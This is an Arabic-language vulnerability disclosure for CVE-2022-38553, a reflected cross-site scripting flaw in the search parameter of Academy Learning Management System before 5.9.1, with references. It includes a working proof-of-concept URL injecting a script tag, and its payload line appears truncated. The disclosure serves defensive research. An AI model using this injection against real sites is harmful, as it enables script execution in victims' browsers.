
البرمجة النصية عبر المواقع (XSS) على "ACADEMY LEARNING MANAGEMENT SYSTEM" - إثبات المفهوم (POC) CVE-2022-38553
ثغرة البرمجة النصية عبر المواقع (XSS) في "ACADEMY LEARNING MANAGEMENT SYSTEM" < v5.9.1 - إثبات المفهوم (POC) لـ CVE-2022-38553
العنوان الاستغلالي: ACADEMY LEARNING MANAGEMENT SYSTEM < v5.9.1 - Cross Site Scripting (XSS)
معرف CVE: CVE-2022-38553
مؤلف الاستغلال: 4websecurity
صفحة المؤلف على الويب: https://4websecurity.com
التاريخ: 16-08-2022
الصفحة الرئيسية للبائع: https://creativeitem.com
الإصدار: up to 5.9.1
صفحة العرض التوضيحي للبائع: https://demo.creativeitem.com/academy/home/
المراجع:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38553
https://www.openbugbounty.org/reports/2849933/
https://cve.report/CVE-2022-38553
https://nvd.nist.gov/vuln/detail/CVE-2022-38553
https://youtu.be/yFiZffHoeKs
حقل الثغرة:
ثغرة البرمجة النصية عبر المواقع (XSS) في ACADEMY LEARNING MANAGEMENT SYSTEM <5.9.1 تسمح للمهاجمين عن بعد بحقن نصوص ويب أو HTML عشوائية عبر معلمة search?query.
إثبات المفهوم (POC):
https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
الحمولة:
">
المخاطر الأمنية:
تسمح هذه الثغرة الأمنية بتنفيذ كود JavaScript عشوائي في متصفح المستخدم إذا قاموا بالوصول إلى رابط أعده المهاجمون.